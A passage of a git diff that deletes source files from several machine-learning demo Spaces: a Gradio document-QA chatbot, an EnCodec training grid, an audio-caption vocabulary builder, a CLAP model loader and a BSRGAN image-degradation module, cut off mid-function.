Create a knowledge base from the loaded documents using the create_knowledge_base() method - knowledge_base = self.create_knowledge_base(docs) - - return file_paths,{"knowledge_base":knowledge_base} - - def answer_question(self, question,history,state): - """Answer a question based on the current knowledge base. - Args: - state (dict): The current state containing the knowledge base. - Returns: - str: The answer to the question. - """ - - # Retrieve the knowledge base from the state dictionary - knowledge_base = state["knowledge_base"] - retriever = knowledge_base.as_retriever() - qa = ConversationalRetrievalChain.from_llm( - llm=OpenAI(temperature=0.1), - retriever=retriever, - return_source_documents=False) - # Set the question for which we want to find the answer - res = [] - question = history[-1][0] - for human, ai in history[:-1]: - pair = (human, ai) - res.append(pair) - - chat_history = [] - - query = question - result = qa({"question": query, "chat_history": chat_history}) - # Perform a similarity search on the knowledge base to retrieve relevant documents - response = result["answer"] - # Return the response as the answer to the question - history[-1][1] = response - print("History for QA : ",history) - return history - - - def clear_function(self,state): - state.clear() - # state = gr.State(self.get_empty_state()) - - def gradio_interface(self): - - """Create the Gradio interface for the Chemical Identifier.""" - - with gr.Blocks(css="style.css",theme='karthikeyan-adople/hudsonhayes-gray') as demo: - gr.HTML("""
    -
    -

    - ADOPLE AI -

    -
    - -

    - Virtual Assistant Chatbot -

    -
    """) - state = gr.State(self.get_empty_state()) - with gr.Column(elem_id="col-container"): - with gr.Accordion("Upload Files", open = False): - with gr.Row(elem_id="row-flex"): - with gr.Row(elem_id="row-flex"): - with gr.Column(scale=1,): - file_url = gr.Textbox(label='file url :',show_label=True, placeholder="") - with gr.Row(elem_id="row-flex"): - with gr.Column(scale=1): - file_output = gr.File() - with gr.Column(scale=1): - upload_button = gr.UploadButton("Browse File", file_types=[".txt", ".pdf", ".doc", ".docx"],file_count = "multiple") - with gr.Row(): - chatbot = gr.Chatbot([], elem_id="chatbot") - with gr.Row(): - txt = gr.Textbox(label = "Question",show_label=True,placeholder="Enter text and press Enter") - with gr.Row(): - clear_btn = gr.Button(value="Clear") - - txt_msg = txt.submit(self.add_text, [chatbot, txt], [chatbot, txt], queue=False).then(self.answer_question, [txt, chatbot, state], chatbot) - txt_msg.then(lambda: gr.update(interactive=True), None, [txt], queue=False) - file_url.submit(self.upload_multiple_urls, file_url, [file_output, state]) - clear_btn.click(self.clear_function,[state],[]) - clear_btn.click(lambda: None, None, chatbot, queue=False) - upload_button.upload(self.upload_file, upload_button, [file_output,state]) - demo.queue().launch(debug=True) - -if __name__=="__main__": - chatbot = Chatbot() - chatbot.gradio_interface() \ No newline at end of file diff --git a/spaces/AIConsultant/MusicGen/audiocraft/grids/compression/encodec_base_24khz.py b/spaces/AIConsultant/MusicGen/audiocraft/grids/compression/encodec_base_24khz.py deleted file mode 100644 index 117b2b1e496ca31b3d614672b472c9213cedb4ad..0000000000000000000000000000000000000000 --- a/spaces/AIConsultant/MusicGen/audiocraft/grids/compression/encodec_base_24khz.py +++ /dev/null @@ -1,28 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -""" -Grid search file, simply list all the exp you want in `explorer`. -Any new exp added there will be scheduled. -You can cancel and experiment by commenting its line. - -This grid shows how to train a base causal EnCodec model at 24 kHz. -""" - -from ._explorers import CompressionExplorer -from ...environment import AudioCraftEnvironment - - -@CompressionExplorer -def explorer(launcher): - partitions = AudioCraftEnvironment.get_slurm_partitions(['team', 'global']) - launcher.slurm_(gpus=8, partition=partitions) - # base causal EnCodec trained on monophonic audio sampled at 24 kHz - launcher.bind_(solver='compression/encodec_base_24khz') - # replace this by the desired dataset - launcher.bind_(dset='audio/example') - # launch xp - launcher() diff --git a/spaces/AIGC-Audio/AudioGPT/audio_to_text/captioning/utils/build_vocab_ltp.py b/spaces/AIGC-Audio/AudioGPT/audio_to_text/captioning/utils/build_vocab_ltp.py deleted file mode 100644 index aae0c718ae546882dcb573be42ace3408394468f..0000000000000000000000000000000000000000 --- a/spaces/AIGC-Audio/AudioGPT/audio_to_text/captioning/utils/build_vocab_ltp.py +++ /dev/null @@ -1,150 +0,0 @@ -import json -from tqdm import tqdm -import logging -import pickle -from collections import Counter -import re -import fire - -class Vocabulary(object): - """Simple vocabulary wrapper.""" - def __init__(self): - self.word2idx = {} - self.idx2word = {} - self.idx = 0 - - def add_word(self, word): - if not word in self.word2idx: - self.word2idx[word] = self.idx - self.idx2word[self.idx] = word - self.idx += 1 - - def __call__(self, word): - if not word in self.word2idx: - return self.word2idx[""] - return self.word2idx[word] - - def __len__(self): - return len(self.word2idx) - -def build_vocab(input_json: str, - output_json: str, - threshold: int, - keep_punctuation: bool, - character_level: bool = False, - zh: bool = True ): - """Build vocabulary from csv file with a given threshold to drop all counts < threshold - - Args: - input_json(string): Preprossessed json file. Structure like this: - { - 'audios': [ - { - 'audio_id': 'xxx', - 'captions': [ - { - 'caption': 'xxx', - 'cap_id': 'xxx' - } - ] - }, - ... - ] - } - threshold (int): Threshold to drop all words with counts < threshold - keep_punctuation (bool): Includes or excludes punctuation. - - Returns: - vocab (Vocab): Object with the processed vocabulary -""" - data = json.load(open(input_json, "r"))["audios"] - counter = Counter() - pretokenized = "tokens" in data[0]["captions"][0] - - if zh: - from ltp import LTP - from zhon.hanzi import punctuation - if not pretokenized: - parser = LTP("base") - for audio_idx in tqdm(range(len(data)), leave=False, ascii=True): - for cap_idx in range(len(data[audio_idx]["captions"])): - if pretokenized: - tokens = data[audio_idx]["captions"][cap_idx]["tokens"].split() - else: - caption = data[audio_idx]["captions"][cap_idx]["caption"] - if character_level: - tokens = list(caption) - else: - tokens, _ = parser.seg([caption]) - tokens = tokens[0] - # Remove all punctuations - if not keep_punctuation: - tokens = [token for token in tokens if token not in punctuation] - data[audio_idx]["captions"][cap_idx]["tokens"] = " ".join(tokens) - counter.update(tokens) - else: - if pretokenized: - for audio_idx in tqdm(range(len(data)), leave=False, ascii=True): - for cap_idx in range(len(data[audio_idx]["captions"])): - tokens = data[audio_idx]["captions"][cap_idx]["tokens"].split() - counter.update(tokens) - else: - from pycocoevalcap.tokenizer.ptbtokenizer import PTBTokenizer - captions = {} - for audio_idx in range(len(data)): - audio_id = data[audio_idx]["audio_id"] - captions[audio_id] = [] - for cap_idx in range(len(data[audio_idx]["captions"])): - caption = data[audio_idx]["captions"][cap_idx]["caption"] - captions[audio_id].append({ - "audio_id": audio_id, - "id": cap_idx, - "caption": caption - }) - tokenizer = PTBTokenizer() - captions = tokenizer.tokenize(captions) - for audio_idx in tqdm(range(len(data)), leave=False, ascii=True): - audio_id = data[audio_idx]["audio_id"] - for cap_idx in range(len(data[audio_idx]["captions"])): - tokens = captions[audio_id][cap_idx] - data[audio_idx]["captions"][cap_idx]["tokens"] = tokens - counter.update(tokens.split(" ")) - - if not pretokenized: - if output_json is None: - output_json = input_json - json.dump({ "audios": data }, open(output_json, "w"), indent=4, ensure_ascii=not zh) - words = [word for word, cnt in counter.items() if cnt >= threshold] - - # Create a vocab wrapper and add some special tokens. - vocab = Vocabulary() - vocab.add_word("") - vocab.add_word("") - vocab.add_word("") - vocab.add_word("") - - # Add the words to the vocabulary. - for word in words: - vocab.add_word(word) - return vocab - -def process(input_json: str, - output_file: str, - output_json: str = None, - threshold: int = 1, - keep_punctuation: bool = False, - character_level: bool = False, - zh: bool = True): - logfmt = "%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s" - logging.basicConfig(level=logging.INFO, format=logfmt) - logging.info("Build Vocab") - vocabulary = build_vocab( - input_json=input_json, output_json=output_json, threshold=threshold, - keep_punctuation=keep_punctuation, character_level=character_level, zh=zh) - pickle.dump(vocabulary, open(output_file, "wb")) - logging.info("Total vocabulary size: {}".format(len(vocabulary))) - logging.info("Saved vocab to '{}'".format(output_file)) - - -if __name__ == '__main__': - fire.Fire(process) diff --git a/spaces/AIGC-Audio/Make_An_Audio/ldm/modules/encoders/open_clap/openai.py b/spaces/AIGC-Audio/Make_An_Audio/ldm/modules/encoders/open_clap/openai.py deleted file mode 100644 index 9911b6e135e51970177fcac067c12192b0b57c1c..0000000000000000000000000000000000000000 --- a/spaces/AIGC-Audio/Make_An_Audio/ldm/modules/encoders/open_clap/openai.py +++ /dev/null @@ -1,129 +0,0 @@ -""" OpenAI pretrained model functions - -Adapted from https://github.com/openai/CLIP. Originally MIT License, Copyright (c) 2021 OpenAI. -""" - -import os -import warnings -from typing import Union, List - -import torch - -from .model import build_model_from_openai_state_dict -from .pretrained import get_pretrained_url, list_pretrained_tag_models, download_pretrained - -__all__ = ["list_openai_models", "load_openai_model"] - - -def list_openai_models() -> List[str]: - """Returns the names of available CLIP models""" - return list_pretrained_tag_models('openai') - - -def load_openai_model( - name: str, - model_cfg, - device: Union[str, torch.device] = "cuda" if torch.cuda.is_available() else "cpu", - jit=True, - cache_dir=os.path.expanduser("~/.cache/clip"), - enable_fusion: bool = False, - fusion_type: str = 'None' -): - """Load a CLIP model, preserve its text pretrained part, and set in the CLAP model - - Parameters - ---------- - name : str - A model name listed by `clip.available_models()`, or the path to a model checkpoint containing the state_dict - device : Union[str, torch.device] - The device to put the loaded model - jit : bool - Whether to load the optimized JIT model (default) or more hackable non-JIT model. - - Returns - ------- - model : torch.nn.Module - The CLAP model - preprocess : Callable[[PIL.Image], torch.Tensor] - A torchvision transform that converts a PIL image into a tensor that the returned model can take as its input - """ - if get_pretrained_url(name, 'openai'): - model_path = download_pretrained(get_pretrained_url(name, 'openai'), root=cache_dir) - elif os.path.isfile(name): - model_path = name - else: - raise RuntimeError(f"Model {name} not found; available models = {list_openai_models()}") - - try: - # loading JIT archive - model = torch.jit.load(model_path, map_location=device if jit else "cpu").eval() - state_dict = None - except RuntimeError: - # loading saved state dict - if jit: - warnings.warn(f"File {model_path} is not a JIT archive. Loading as a state dict instead") - jit = False - state_dict = torch.load(model_path, map_location="cpu") - - if not jit: - try: - model = build_model_from_openai_state_dict(state_dict or model.state_dict(), model_cfg, enable_fusion, fusion_type).to(device) - except KeyError: - sd = {k[7:]: v for k, v in state_dict["state_dict"].items()} - model = build_model_from_openai_state_dict(sd, model_cfg, enable_fusion, fusion_type).to(device) - - if str(device) == "cpu": - model.float() - return model - - # patch the device names - device_holder = torch.jit.trace(lambda: torch.ones([]).to(torch.device(device)), example_inputs=[]) - device_node = [n for n in device_holder.graph.findAllNodes("prim::Constant") if "Device" in repr(n)][-1] - - def patch_device(module): - try: - graphs = [module.graph] if hasattr(module, "graph") else [] - except RuntimeError: - graphs = [] - - if hasattr(module, "forward1"): - graphs.append(module.forward1.graph) - - for graph in graphs: - for node in graph.findAllNodes("prim::Constant"): - if "value" in node.attributeNames() and str(node["value"]).startswith("cuda"): - node.copyAttributes(device_node) - - model.apply(patch_device) - patch_device(model.encode_audio) - patch_device(model.encode_text) - - # patch dtype to float32 on CPU - if str(device) == "cpu": - float_holder = torch.jit.trace(lambda: torch.ones([]).float(), example_inputs=[]) - float_input = list(float_holder.graph.findNode("aten::to").inputs())[1] - float_node = float_input.node() - - def patch_float(module): - try: - graphs = [module.graph] if hasattr(module, "graph") else [] - except RuntimeError: - graphs = [] - - if hasattr(module, "forward1"): - graphs.append(module.forward1.graph) - - for graph in graphs: - for node in graph.findAllNodes("aten::to"): - inputs = list(node.inputs()) - for i in [1, 2]: # dtype can be the second or third argument to aten::to() - if inputs[i].node()["value"] == 5: - inputs[i].node().copyAttributes(float_node) - - model.apply(patch_float) - patch_float(model.encode_audio) - patch_float(model.encode_text) - model.float() - - model.audio_branch.audio_length = model.audio_cfg.audio_length - return model diff --git a/spaces/AIGText/GlyphControl/ldm/modules/image_degradation/bsrgan.py b/spaces/AIGText/GlyphControl/ldm/modules/image_degradation/bsrgan.py deleted file mode 100644 index 32ef56169978e550090261cddbcf5eb611a6173b..0000000000000000000000000000000000000000 --- a/spaces/AIGText/GlyphControl/ldm/modules/image_degradation/bsrgan.py +++ /dev/null @@ -1,730 +0,0 @@ -# -*- coding: utf-8 -*- -""" -# -------------------------------------------- -# Super-Resolution -# -------------------------------------------- -# -# Kai Zhang (cskaizhang@gmail.com) -# https://github.com/cszn -# From 2019/03--2021/08 -# -------------------------------------------- -""" - -import numpy as np -import cv2 -import torch - -from functools import partial -import random -from scipy import ndimage -import scipy -import scipy.stats as ss -from scipy.interpolate import interp2d -from scipy.linalg import orth -import albumentations - -import ldm.modules.image_degradation.utils_image as util - - -def modcrop_np(img, sf): - ''' - Args: - img: numpy image, WxH or WxHxC - sf: scale factor - Return: - cropped image - ''' - w, h = img.shape[:2] - im = np.copy(img) - return im[:w - w % sf, :h - h % sf, ...] - - -""" -# -------------------------------------------- -# anisotropic Gaussian kernels -# -------------------------------------------- -""" - - -def analytic_kernel(k): - """Calculate the X4 kernel from the X2 kernel (for proof see appendix in paper)""" - k_size = k.shape[0] - # Calculate the big kernels size - big_k = np.zeros((3 * k_size - 2, 3 * k_size - 2)) - # Loop over the small kernel to fill the big one - for r in range(k_size): - for c in range(k_size): - big_k[2 * r:2 * r + k_size, 2 * c:2 * c + k_size] += k[r, c] * k - # Crop the edges of the big kernel to ignore very small values and increase run time of SR - crop = k_size // 2 - cropped_big_k = big_k[crop:-crop, crop:-crop] - # Normalize to 1 - return cropped_big_k / cropped_big_k.sum() - - -def anisotropic_Gaussian(ksize=15, theta=np.pi, l1=6, l2=6): - """ generate an anisotropic Gaussian kernel - Args: - ksize : e.g., 15, kernel size - theta : [0, pi], rotation angle range - l1 : [0.1,50], scaling of eigenvalues - l2 : [0.1,l1], scaling of eigenvalues - If l1 = l2, will get an isotropic Gaussian kernel. - Returns: - k : kernel - """ - - v = np.dot(np.array([[np.cos(theta), -np.sin(theta)], [np.sin(theta), np.cos(theta)]]), np.array([1., 0.])) - V = np.array([[v[0], v[1]], [v[1], -v[0]]]) - D = np.array([[l1, 0], [0, l2]]) - Sigma = np.dot(np.dot(V, D), np.linalg.inv(V)) - k = gm_blur_kernel(mean=[0, 0], cov=Sigma, size=ksize) - - return k - - -def gm_blur_kernel(mean, cov, size=15): - center = size / 2.0 + 0.5 - k = np.zeros([size, size]) - for y in range(size): - for x in range(size): - cy = y - center + 1 - cx = x - center + 1 - k[y, x] = ss.multivariate_normal.pdf([cx, cy], mean=mean, cov=cov) - - k = k / np.sum(k) - return k - - -def shift_pixel(x, sf, upper_left=True): - """shift pixel for super-resolution with different scale factors - Args: - x: WxHxC or WxH - sf: scale factor - upper_left: shift direction - """ - h, w = x.shape[:2] - shift = (sf - 1) * 0.5 - xv, yv = np.arange(0, w, 1.0), np.arange(0, h, 1.0) - if upper_left: - x1 = xv + shift - y1 = yv + shift - else: - x1 = xv - shift - y1 = yv - shift - - x1 = np.clip(x1, 0, w - 1) - y1 = np.clip(y1, 0, h - 1) - - if x.ndim == 2: - x = interp2d(xv, yv, x)(x1, y1) - if x.ndim == 3: - for i in range(x.shape[-1]): - x[:, :, i] = interp2d(xv, yv, x[:, :, i])(x1, y1) - - return x - - -def blur(x, k): - ''' - x: image, NxcxHxW - k: kernel, Nx1xhxw - ''' - n, c = x.shape[:2] - p1, p2 = (k.shape[-2] - 1) // 2, (k.shape[-1] - 1) // 2 - x = torch.nn.functional.pad(x, pad=(p1, p2, p1, p2), mode='replicate') - k = k.repeat(1, c, 1, 1) - k = k.view(-1, 1, k.shape[2], k.shape[3]) - x = x.view(1, -1, x.shape[2], x.shape[3]) - x = torch.nn.functional.conv2d(x, k, bias=None, stride=1, padding=0, groups=n * c) - x = x.view(n, c, x.shape[2], x.shape[3]) - - return x - - -def gen_kernel(k_size=np.array([15, 15]), scale_factor=np.array([4, 4]), min_var=0.6, max_var=10., noise_level=0): - """" - # modified version of https://github.com/assafshocher/BlindSR_dataset_generator - # Kai Zhang - # min_var = 0.175 * sf # variance of the gaussian kernel will be sampled between min_var and max_var - # max_var = 2.5 * sf - """ - # Set random eigen-vals (lambdas) and angle (theta) for COV matrix - lambda_1 = min_var + np.random.rand() * (max_var - min_var) - lambda_2 = min_var + np.random.rand() * (max_var - min_var) - theta = np.random.rand() * np.pi # random theta - noise = -noise_level + np.random.rand(*k_size) * noise_level * 2 - - # Set COV matrix using Lambdas and Theta - LAMBDA = np.diag([lambda_1, lambda_2]) - Q = np.array([[np.cos(theta), -np.sin(theta)], - [np.sin(theta), np.cos(theta)]]) - SIGMA = Q @ LAMBDA @ Q.T - INV_SIGMA = np.linalg.inv(SIGMA)[None, None, :, :] - - # Set expectation position (shifting kernel for aligned image) - MU = k_size // 2 - 0.5 * (scale_factor - 1) # - 0.5 * (scale_factor - k_size % 2) - MU = MU[None, None, :, None] - - # Create meshgrid for Gaussian - [X, Y] = np.meshgrid(range(k_size[0]), range(k_size[1])) - Z = np.stack([X, Y], 2)[:, :, :, None] - - # Calcualte Gaussian for every pixel of the kernel - ZZ = Z - MU - ZZ_t = ZZ.transpose(0, 1, 3, 2) - raw_kernel = np.exp(-0.5 * np.squeeze(ZZ_t @ INV_SIGMA @ ZZ)) * (1 + noise) - - # shift the kernel so it will be centered - # raw_kernel_centered = kernel_shift(raw_kernel, scale_factor) - - # Normalize the kernel and return - # kernel = raw_kernel_centered / np.sum(raw_kernel_centered) - kernel = raw_kernel / np.sum(raw_kernel) - return kernel - - -def fspecial_gaussian(hsize, sigma): - hsize = [hsize, hsize] - siz = [(hsize[0] - 1.0) / 2.0, (hsize[1] - 1.0) / 2.0] - std = sigma - [x, y] = np.meshgrid(np.arange(-siz[1], siz[1] + 1), np.arange(-siz[0], siz[0] + 1)) - arg = -(x * x + y * y) / (2 * std * std) - h = np.exp(arg) - h[h < scipy.finfo(float).eps * h.max()] = 0 - sumh = h.sum() - if sumh != 0: - h = h / sumh - return h - - -def fspecial_laplacian(alpha): - alpha = max([0, min([alpha, 1])]) - h1 = alpha / (alpha + 1) - h2 = (1 - alpha) / (alpha + 1) - h = [[h1, h2, h1], [h2, -4 / (alpha + 1), h2], [h1, h2, h1]] - h = np.array(h) - return h - - -def fspecial(filter_type, *args, **kwargs): - ''' - python code from: - https://github.com/ronaldosena/imagens-medicas-2/blob/40171a6c259edec7827a6693a93955de2bd39e76/Aulas/aula_2_-_uniform_filter/matlab_fspecial.py - ''' - if filter_type == 'gaussian': - return fspecial_gaussian(*args, **kwargs) - if filter_type == 'laplacian': - return fspecial_laplacian(*args, **kwargs) - - -""" -# -------------------------------------------- -# degradation models -# -------------------------------------------- -""" - - -def bicubic_degradation(x, sf=3): - ''' - Args: - x: HxWxC image, [0, 1] - sf: down-scale factor - Return: - bicubicly downsampled LR image - ''' - x = util.imresize_np(x, scale=1 / sf) - return x - - -def srmd_degradation(x, k, sf=3): - ''' blur + bicubic downsampling - Args: - x: HxWxC image, [0, 1] - k: hxw, double - sf: down-scale factor - Return: - downsampled LR image - Reference: - @inproceedings{zhang2018learning, - title={Learning a single convolutional super-resolution network for multiple degradations}, - author={Zhang, Kai and Zuo, Wangmeng and Zhang, Lei}, - booktitle={IEEE Conference on Computer Vision and Pattern Recognition}, - pages={3262--3271}, - year={2018} - } - ''' - x = ndimage.filters.convolve(x, np.expand_dims(k, axis=2), mode='wrap') # 'nearest' | 'mirror' - x = bicubic_degradation(x, sf=sf) - return x - - -def dpsr_degradation(x, k, sf=3): - ''' bicubic downsampling + blur - Args: - x: HxWxC image, [0, 1] - k: hxw, double - sf: down-scale factor - Return: - downsampled LR image - Reference: - @inproceedings{zhang2019deep, - title={Deep Plug-and-Play Super-Resolution for Arbitrary Blur Kernels}, - author={Zhang, Kai and Zuo, Wangmeng and Zhang, Lei}, - booktitle={IEEE Conference on Computer Vision and Pattern Recognition}, - pages={1671--1681}, - year={2019} - } - ''' - x = bicubic_degradation(x, sf=sf) - x = ndimage.filters.convolve(x, np.expand_dims(k, axis=2), mode='wrap') - return x - - -def classical_degradation(x, k, sf=3): - ''' blur + downsampling - Args: - x: HxWxC image, [0, 1]/[0, 255] - k: hxw, double - sf: down-scale factor - Return: - downsampled LR image - ''' - x = ndimage.filters.convolve(x, np.expand_dims(k, axis=2), mode='wrap') - # x = filters.correlate(x, np.expand_dims(np.flip(k), axis=2)) - st = 0 - return x[st::sf, st::sf, ...] - - -def add_sharpening(img, weight=0.5, radius=50, threshold=10): - """USM sharpening. borrowed from real-ESRGAN - Input image: I; Blurry image: B. - 1. K = I + weight * (I - B) - 2. Mask = 1 if abs(I - B) > threshold, else: 0 - 3. Blur mask: - 4. Out = Mask * K + (1 - Mask) * I - Args: - img (Numpy array): Input image, HWC, BGR; float32, [0, 1]. - weight (float): Sharp weight. Default: 1. - radius (float): Kernel size of Gaussian blur. Default: 50. - threshold (int): - """ - if radius % 2 == 0: - radius += 1 - blur = cv2.GaussianBlur(img, (radius, radius), 0) - residual = img - blur - mask = np.abs(residual) * 255 > threshold - mask = mask.astype('float32') - soft_mask = cv2.GaussianBlur(mask, (radius, radius), 0) - - K = img + weight * residual - K = np.clip(K, 0, 1) - return soft_mask * K + (1 - soft_mask) * img - - -def add_blur(img, sf=4): - wd2 = 4.0 + sf - wd = 2.0 + 0.2 * sf - if random.random() < 0.5: - l1 = wd2 * random.random() - l2 = wd2 * random.random() - k = anisotropic_Gaussian(ksize=2 * random.randint(2, 11) + 3, theta=random.random() * np.pi, l1=l1, l2=l2) - else: - k = fspecial('gaussian', 2 * random.randint(2, 11) + 3, wd * random.random()) - img = ndimage.filters.convolve(img, np.expand_dims(k, axis=2), mode='mirror') - - return img - - -def add_resize(img, sf=4): - rnum = np.random.rand() - if rnum > 0.8: # up - sf1 = random.uniform(1, 2) - elif rnum < 0.7: # down - sf1 = random.uniform(0.5 / sf, 1) - else: - sf1 = 1.0 - img = cv2.resize(img, (int(sf1 * img.shape[1]), int(sf1 * img.shape[0])), interpolation=random.choice([1, 2, 3])) - img = np.clip(img, 0.0, 1.0) - - return img - - -# def add_Gaussian_noise(img, noise_level1=2, noise_level2=25): -# noise_level = random.randint(noise_level1, noise_level2) -# rnum = np.random.rand() -# if rnum > 0.6: # add color Gaussian noise -# img += np.random.normal(0, noise_level / 255.0, img.shape).astype(np.float32) -# elif rnum < 0.4: # add grayscale Gaussian noise -# img += np.random.normal(0, noise_level / 255.0, (*img.shape[:2], 1)).astype(np.float32) -# else: # add noise -# L = noise_level2 / 255. -# D = np.diag(np.random.rand(3)) -# U = orth(np.random.rand(3, 3)) -# conv = np.dot(np.dot(np.transpose(U), D), U) -# img += np.random.multivariate_normal([0, 0, 0], np.abs(L ** 2 * conv), img.shape[:2]).astype(np.float32) -# img = np.clip(img, 0.0, 1.0) -# return img - -def add_Gaussian_noise(img, noise_level1=2, noise_level2=25): - noise_level = random.randint(noise_level1, noise_level2) - rnum = np.random.rand() - if rnum > 0.6: # add color Gaussian noise - img = img + np.random.normal(0, noise_level / 255.0, img.shape).astype(np.float32) - elif rnum < 0.4: # add grayscale Gaussian noise - img = img + np.random.normal(0, noise_level / 255.0, (*img.shape[:2], 1)).astype(np.float32) - else: # add noise - L = noise_level2 / 255. - D = np.diag(np.random.rand(3)) - U = orth(np.random.rand(3, 3)) - conv = np.dot(np.dot(np.transpose(U), D), U) - img = img + np.random.multivariate_normal([0, 0, 0], np.abs(L ** 2 * conv), img.shape[:2]).astype(np.float32) - img = np.clip(img, 0.0, 1.0) - return img - - -def add_speckle_noise(img, noise_level1=2, noise_level2=25): - noise_level = random.randint(noise_level1, noise_level2) - img = np.clip(img, 0.0, 1.0) - rnum = random.random() - if rnum > 0.6: - img += img * np.random.normal(0, noise_level / 255.0, img.shape).astype(np.float32) - elif rnum < 0.4: - img += img * np.random.normal(0, noise_level / 255.0, (*img.shape[:2], 1)).astype(np.float32) - else: - L = noise_level2 / 255. - D = np.diag(np.random.rand(3)) - U = orth(np.random.rand(3, 3)) - conv = np.dot(np.dot(np.transpose(U), D), U) - img += img * np.random.multivariate_normal([0, 0, 0], np.abs(L ** 2 * conv), img.shape[:2]).astype(np.float32) - img = np.clip(img, 0.0, 1.0) - return img - - -def add_Poisson_noise(img): - img = np.clip((img * 255.0).round(), 0, 255) / 255. - vals = 10 ** (2 * random.random() + 2.0) # [2, 4] - if random.random() < 0.5: - img = np.random.poisson(img * vals).astype(np.float32) / vals - else: - img_gray = np.dot(img[..., :3], [0.299, 0.587, 0.114]) - img_gray = np.clip((img_gray * 255.0).round(), 0, 255) / 255. - noise_gray = np.random.poisson(img_gray * vals).astype(np.float32) / vals - img_gray - img += noise_gray[:, :, np.newaxis] - img = np.clip(img, 0.0, 1.0) - return img - - -def add_JPEG_noise(img): - quality_factor = random.randint(30, 95) - img = cv2.cvtColor(util.single2uint(img), cv2.COLOR_RGB2BGR) - result, encimg = cv2.imencode('.jpg', img, [int(cv2.IMWRITE_JPEG_QUALITY), quality_factor]) - img = cv2.imdecode(encimg, 1) - img = cv2.cvtColor(util.uint2single(img), cv2.COLOR_BGR2RGB) - return img - - -def random_crop(lq, hq, sf=4, lq_patchsize=64): - h, w = lq.shape[:2] - rnd_h = random.randint(0, h - lq_patchsize) - rnd_w = random.randint(0, w - lq_patchsize) - lq = lq[rnd_h:rnd_h + lq_patchsize, rnd_w:rnd_w + lq_patchsize, :] - - rnd_h_H, rnd_w_H = int(rnd_h * sf), int(rnd_w * sf) - hq = hq[rnd_h_H:rnd_h_H + lq_patchsize * sf, rnd_w_H:rnd_w_H + lq_patchsize * sf, :] - return lq, hq - - -def degradation_bsrgan(img, sf=4, lq_patchsize=72, isp_model=None): - """ - This is the degradation model of BSRGAN from the paper - "Designing a Practical Degradation Model for Deep Blind Image Super-Resolution" - ---------- - img: HXWXC, [0, 1], its size should be large than (lq_patchsizexsf)x(lq_patchsizexsf) - sf: scale factor - isp_model: camera ISP model - Returns - ------- - img: low-quality patch, size: lq_patchsizeXlq_patchsizeXC, range: [0, 1] - hq: corresponding high-quality patch, size: (lq_patchsizexsf)X(lq_patchsizexsf)XC, range: [0, 1] - """ - isp_prob, jpeg_prob, scale2_prob = 0.25, 0.9, 0.25 - sf_ori = sf - - h1, w1 = img.shape[:2] - img = img.copy()[:w1 - w1 % sf, :h1 - h1 % sf, ...] # mod crop - h, w = img.shape[:2] - - if h < lq_patchsize * sf or w < lq_patchsize * sf: - raise ValueError(f'img size ({h1}X{w1}) is too small!') - - hq = img.copy() - - if sf == 4 and random.random() < scale2_prob: # downsample1 - if np.random.rand() < 0.5: - img = cv2.resize(img, (int(1 / 2 * img.shape[1]), int(1 / 2 * img.shape[0])), - interpolation=random.choice([1, 2, 3])) - else: - img = util.imresize_np(img, 1 / 2, True) - img = np.clip(img, 0.0, 1.0) - sf = 2 - - shuffle_order = random.sample(range(7), 7) - idx1, idx2 = shuffle_order.index(2), shuffle_order.index(3) - if idx1 > idx2: # keep downsample3 last - shuffle_order[idx1], shuffle_order[idx2] = shuffle_order[idx2], shuffle_order[idx1] - - for i in shuffle_order: - - if i == 0: - img = add_blur(img, sf=sf) - - elif i == 1: - img = add_blur(img, sf=sf) - - elif i == 2: - a, b = img.shape[1], img.shape[0] - # downsample2 - if random.random() < 0.75: - sf1 = random.uniform(1, 2 * sf) - img = cv2.resize(img, (int(1 / sf1 * img.shape[1]), int(1 / sf1 * img.shape[0])), - interpolation=random.choice([1, 2, 3])) - else: - k = fspecial('gaussian', 25, random.uniform(0.1, 0.6 * sf)) - k_shifted = shift_pixel(k, sf) - k_shifted = k_shifted / k_shifted.sum() # blur with shifted kernel - img = ndimage.filters.convolve(img, np.expand_dims(k_shifted, axis=2), mode='mirror') - img = img[0::sf, 0::sf, ...] # nearest downsampling - img = np.clip(img, 0.0, 1.0) - - elif i == 3: - # downsample3 - img = cv2.resize(img, (int(1 / sf * a), int(1 / sf * b)), interpolation=random.choice([1, 2, 3])) - img = np.clip(img, 0.0, 1.0) - - elif i == 4: - # add Gaussian noise - img = add_Gaussian_noise(img, noise_level1=2, noise_level2=25) - - elif i == 5: - # add JPEG noise - if random.random() < jpeg_prob: - img = add_JPEG_noise(img) - - elif i == 6: - # add processed camera sensor noise - if random.random() < isp_prob and isp_model is not None: - with torch.no_grad(): - img, hq = isp_model.forward(img.copy(), hq) - - # add final JPEG compression noise - img = add_JPEG_noise(img) - - # random crop - img, hq = random_crop(img, hq, sf_ori, lq_patchsize) - - return img, hq - - -# todo no isp_model? -def degradation_bsrgan_variant(image, sf=4, isp_model=None): - """ - This is the degradation model of BSRGAN from the paper - "Designing a Practical Degradation Model for Deep Blind Image Super-Resolution" - ---------- - sf: scale factor - isp_model: camera ISP model - Returns - ------- - img: low-quality patch, size: lq_patchsizeXlq_patchsizeXC, range: [0, 1] - hq: corresponding high-quality patch, size: (lq_patchsizexsf)X(lq_patchsizexsf)XC, range: [0, 1] - """ - image = util.uint2single(image) - isp_prob, jpeg_prob, scale2_prob = 0.25, 0.9, 0.25 - sf_ori = sf - - h1, w1 = image.shape[:2] - image = image.copy()[:w1 - w1 % sf, :h1 - h1 % sf, ...] # mod crop - h, w = image.shape[:2] - - hq = image.copy() - - if sf == 4 and random.random() < scale2_prob: # downsample1 - if np.random.rand() < 0.5: - image = cv2.resize(image, (int(1 / 2 * image.shape[1]), int(1 / 2 * image.shape[0])), - interpolation=random.choice([1, 2, 3])) - else: - image = util.imresize_np(image, 1 / 2, True) - image = np.clip(image, 0.0, 1.0) - sf = 2 - - shuffle_order = random.sample(range(7), 7) - idx1, idx2 = shuffle_order.index(2), shuffle_order.index(3) - if idx1 > idx2: # keep downsample3 last - shuffle_order[idx1], shuffle_order[idx2] = shuffle_order[idx2], shuffle_order[idx1] - - for i in shuffle_order: - - if i == 0: - image = add_blur(image, sf=sf) - - elif i == 1: - image = add_blur(image, sf=sf) - - elif i == 2: - a, b = image.shape[1], image.shape[0] - # downsample2 - if random.random() < 0.75: - sf1 = random.uniform(1, 2 * sf) - image = cv2.resize(image, (int(1 / sf1 * image.shape[1]), int(1 / sf1 * 